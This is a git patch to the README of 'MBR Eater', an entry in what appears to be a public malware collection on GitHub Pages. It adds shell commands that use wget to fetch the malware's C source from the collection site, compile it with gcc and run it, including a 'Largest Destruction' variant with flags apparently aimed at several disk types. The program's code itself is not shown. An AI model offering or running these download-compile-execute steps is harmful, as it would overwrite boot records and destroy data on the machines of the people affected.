From 7a93b3a7239e7657f1323889e7ce1dceec5d8de6 Mon Sep 17 00:00:00 2001 From: Chen Youyou Date: Fri, 26 Aug 2022 13:58:07 +0000 Subject: [PATCH] Update README.md --- authors/cheny0y0/MBR Eater/README.md | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/authors/cheny0y0/MBR Eater/README.md b/authors/cheny0y0/MBR Eater/README.md index ee24514..a20549a 100644 --- a/authors/cheny0y0/MBR Eater/README.md +++ b/authors/cheny0y0/MBR Eater/README.md @@ -1,5 +1,25 @@ # [cheny0y0's malware collection](https://cheny0y0.github.io/malware-collection) Back to [cheny0y0](https://cheny0y0.github.io/malware-collection/authors/cheny0y0) ## MBR Eater +### Supported Platforms: [GNU/Linux](https://cheny0y0.github.io/malware-collection/platforms/gnulinux) ### Source [Download](https://cheny0y0.github.io/malware-collection/authors/cheny0y0/mbr_eater.c) +### Download, compile and run +#### Just joking +```shell +wget https://cheny0y0.github.io/malware-collection/authors/cheny0y0/mbr_eater.c +gcc mbr_eater.c +./a.out +``` +#### Loop devices only +```shell +wget https://cheny0y0.github.io/malware-collection/authors/cheny0y0/mbr_eater.c +gcc -DEAT_L mbr_eater.c +./a.out +``` +#### Largest Destruction +```shell +wget https://cheny0y0.github.io/malware-collection/authors/cheny0y0/mbr_eater.c +gcc -DEAT_F -DEAT_H -DEAT_S -DEAT_N -DEAT_L mbr_eater.c +./a.out +```